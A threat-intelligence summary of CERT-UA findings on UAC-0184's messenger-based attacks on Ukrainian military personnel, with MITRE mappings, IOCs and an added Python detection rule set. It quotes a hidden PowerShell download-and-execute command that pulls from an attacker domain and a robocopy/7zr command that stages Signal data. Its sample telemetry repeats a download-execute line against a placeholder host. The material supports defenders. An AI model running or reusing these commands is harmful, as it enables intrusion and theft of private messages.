Messengers and dating sites – New UAC-0184 attack methods

CERT‑UA reports that the UAC‑0184 group has increased operations in 2024, using popular messengers and social‑engineering lures to deliver loaders and implants aimed at stealing documents and messenger data from Ukrainian Defense Forces personnel. Attackers employ loaders (IDAT variants) and implants including RemcosRAT, ViottoKeylogger, XWorm, SIGTOP and TUSC to harvest and exfiltrate Signal messages and contacts. #UAC-0184 #RemcosRAT

Key points

  • UAC‑0184 targets Ukrainian Defense Forces personnel, using popular messengers as the primary delivery channel.
  • Initial access relies on social engineering: conversation lures, video or legal‑case decoys, and archive/LNK attachments requesting help opening files.
  • Deploys loaders (IDAT family: HijackLoader/SHADOWLADDER/GHOSTPULSE) to stage additional payloads such as RemcosRAT, XWorm, and ViottoKeylogger.
  • SIGTOP and TUSC are explicitly used to steal and download messaging data, including Signal messages and contacts.
  • Observed techniques include PowerShell download/execution, LNK‑based chains, robocopy + 7zr archiving of Signal data, and persistence via Startup LNKs.
  • Multiple C2 hosts and domains (e.g., 178.33.57.148/149, 88.151.192.14, i-like-hokku.co.ua, yeah-biches.kyiv.ua) and many malicious files/hashes are listed as IOCs.
  • Attackers exfiltrate data to remote servers over HTTPS and custom endpoints, and use keylogging and repository theft to collect credentials and message content.

MITRE Techniques

  • [T1566.004] Spearphishing via Service – Messenger platforms used as the primary delivery channel (‘the main channel for the delivery of malware is popular messengers’)
  • [T1566.001] Spearphishing Attachment – Malicious archives/LNKs are sent with social‑engineering baits to entice file opening (‘a file (archive) is transferred … with a request for help in opening/processing it’)
  • [T1589] Gather Victim Identity Information (Social Engineering) – Adversaries leverage personal posts and profile data to identify priority targets (‘any careless online activity of a serviceman (for example, posting a photo in military uniform) makes it easier for attackers’)
  • [T1204] User Execution – Attack relies on the user to open attachments/decoys to execute payloads (‘a file (archive) is transferred … with a request for help in opening/processing it’)
  • [T1059] Command and Scripting Interpreter – PowerShell commands download and execute payloads from remote URLs (‘powershell.exe -WindowStyle hidden … -uri http://yeah-biches.kyiv.ua/securitycheck.exe -OutFile securitycheck.exe; start securitycheck.exe’)
  • [T1518] Software Discovery – Tools like SIGTOP/TUSC used to enumerate and extract messaging application data (‘SIGTOP and TUSC are used to steal and download data from computers, in particular, messages and contact data of Signal’)
  • [T1213] Data from Information Repositories – Direct theft of Signal messages and contacts from local application stores (‘to steal and download data from computers, in particular, messages and contact data of Signal’)
  • [T1056] Input Capture – Use of keyloggers to capture keystrokes and credentials (VIOTTOKEYLOGGER referenced)
  • [T1555] Credentials from Password Stores – Combined input capture and repository access to obtain credentials (‘attackers … steal … messenger data’ and use keyloggers)
  • [T1048] Exfiltration Over Alternative Protocol – Stolen data sent to various remote hosts and HTTPS endpoints (numerous C2 IPs/domains and filebin/file hosting links listed)

Indicators of Compromise

  • [File names & hashes] delivery & payloads – securitycheck.exe (cb4c21ab… e72f17d6…), remcos.exe (6b95e337… 8dc1d26c…), and many additional filenames/hashes listed in the report
  • [Malicious executables] implants & tools – ViottoKeylogger.exe (f601e9ba…), XClient3.exe (c975a325…), sigtop.exe (6da225a4…), up.exe (79f98fa6…), and other binaries
  • [File paths / Hosts] persistence & staging locations – %APPDATA%ServiceUltrathermochemistry.iso, %APPDATA%DDP_BrowserASUS_WMI.dll, %APPDATA%FFO_archive_3JRWeb.exe, and numerous %APPDATA% / %TMP% paths
  • [PowerShell / Commands] observed delivery commands – examples of hidden PowerShell downloads (‘powershell.exe -WindowStyle hidden … -uri http://yeah-biches.kyiv.ua/securitycheck.exe -OutFile securitycheck.exe; start securitycheck.exe’)
  • [Network IPs] C2 and staging servers – 178.33.57.148:443, 88.151.192.14:443, 178.33.57.149:443, and other IPs (178.33.57.159:8899, 185.196.11.194, 94.156.66.107)
  • [Domains / URLs] malicious hosts & payload URLs – i‑like‑hokku.co.ua, yeah‑biches.kyiv.ua, the‑new‑age.co.ua, and file hosting links (e.g., hXXps://filebin.net/…/921292777.png)

UAC‑0184 infection chains typically begin with a social‑engineered message via a messenger that delivers an archive or LNK decoy (legal documents, video, or acquaintance requests). When opened, LNKs or archive contents invoke concealed PowerShell commands that download staged payloads (examples observed: http://yeah-biches.kyiv.ua/securitycheck.exe and http://i-like-hokku.co.ua/sud/dvs.exe) and execute them, placing binaries under %APPDATA% and %TMP% folders and creating startup LNKs for persistence.

Attackers use IDAT loaders (HijackLoader / SHADOWLADDER / GHOSTPULSE) to deploy remote administration and surveillance tools such as RemcosRAT, XWorm, and ViottoKeylogger, while SIGTOP and TUSC are used to enumerate and extract messaging data (notably Signal messages and contacts). Post‑compromise activity includes archiving Signal data via robocopy and 7zr (e.g., robocopy %appdata%\Signal %appdata%\MyData\Signal /E & %temp%\7zr.exe a %appdata%\MyData\%computername%%username%.7z %appdata%\MyData\Signal) and exfiltration to multiple C2 hosts over HTTPS and custom endpoints (observed C2s: 178.33.57.148/149, 88.151.192.14 and domains like yeah-biches.kyiv.ua).
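The two preceding paragraphs describe a chain a defender can match on behaviour rather than on hashes: a hidden PowerShell download-and-execute, robocopy of the Signal profile, 7zr run from %TEMP% to archive it, and a .lnk dropped into the Startup folder. The following detection logic is an added example (not from CERT-UA or the report); the event format, rule names and sample telemetry are constructed, and the `malicious.example` host is a placeholder.

```python
import re
from typing import Dict, List, Tuple

# Behavioural rules for the UAC-0184 chain. Each rule applies to one event
# type: process events are matched on the command line, file events on the
# created path. Hypothetical rule names, chosen for this example.
RULES: Dict[str, Tuple[str, re.Pattern]] = {
    "hidden_powershell_download": ("process", re.compile(
        r"powershell(\.exe)?\b.*-windowstyle\s+hidden.*"
        r"(invoke-webrequest|\biwr\b|-uri\b|downloadfile).*-outfile", re.I)),
    "robocopy_signal_profile": ("process", re.compile(
        r"\brobocopy(\.exe)?\s+\S*\\Signal\b", re.I)),
    "7zr_archive_from_temp": ("process", re.compile(
        r"\\Temp\\7zr?\.exe\s+a\s+", re.I)),
    "startup_folder_lnk": ("file", re.compile(
        r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)),
}

def match_event(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules this single event triggers."""
    field = "cmd" if event["type"] == "process" else "path"
    return [name for name, (etype, pat) in RULES.items()
            if etype == event["type"] and pat.search(event.get(field, ""))]

def triage(events: List[Dict[str, str]]) -> Dict[str, object]:
    """Evaluate one host's events and correlate: robocopy of Signal plus a
    7zr archive from %TEMP% means messenger data was staged for exfiltration,
    which is a stronger signal than either command on its own."""
    hits: Dict[str, List[int]] = {name: [] for name in RULES}
    for idx, ev in enumerate(events):
        for name in match_event(ev):
            hits[name].append(idx)
    staged = bool(hits["robocopy_signal_profile"] and hits["7zr_archive_from_temp"])
    return {"hits": hits, "signal_data_staged": staged}

# Constructed sample telemetry (Sysmon-style, paths shown after %VAR% expansion).
SAMPLE_EVENTS = [
    {"type": "process", "cmd": "powershell.exe -WindowStyle hidden Invoke-WebRequest "
     "-uri http://malicious.example/securitycheck.exe -OutFile securitycheck.exe; start securitycheck.exe"},
    {"type": "process", "cmd": r"robocopy C:\Users\u\AppData\Roaming\Signal "
     r"C:\Users\u\AppData\Roaming\MyData\Signal /E"},
    {"type": "process", "cmd": r"C:\Users\u\AppData\Local\Temp\7zr.exe a "
     r"C:\Users\u\AppData\Roaming\MyData\HOST01u.7z C:\Users\u\AppData\Roaming\MyData\Signal"},
    {"type": "file", "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"type": "process", "cmd": "powershell.exe -NoProfile Get-Process"},  # benign control
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

The rules key on the operator tradecraft (hidden window plus download plus execute, the Signal profile as robocopy source, an archiver launched from %TEMP%) so they survive a change of domain, filename or hash.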

Observed technical IOCs include numerous payload filenames and hashes (securitycheck.exe, remcos.exe, ViottoKeylogger.exe, sigtop.exe, up.exe), specific %APPDATA%/%TMP% staging paths, PowerShell download/execute commands, startup LNK persistence, and listed C2 IPs/domains and file hosting URLs for exfiltration and payload hosting.

Read more: https://cert.gov.ua/article/6278521